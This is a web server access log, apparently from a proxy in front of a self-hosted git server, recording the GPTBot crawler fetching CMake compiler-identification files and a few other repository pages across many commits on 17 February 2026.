git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33683] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33388] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33693] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33657] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33686] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33668] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33692] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33683] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:18:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:18:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 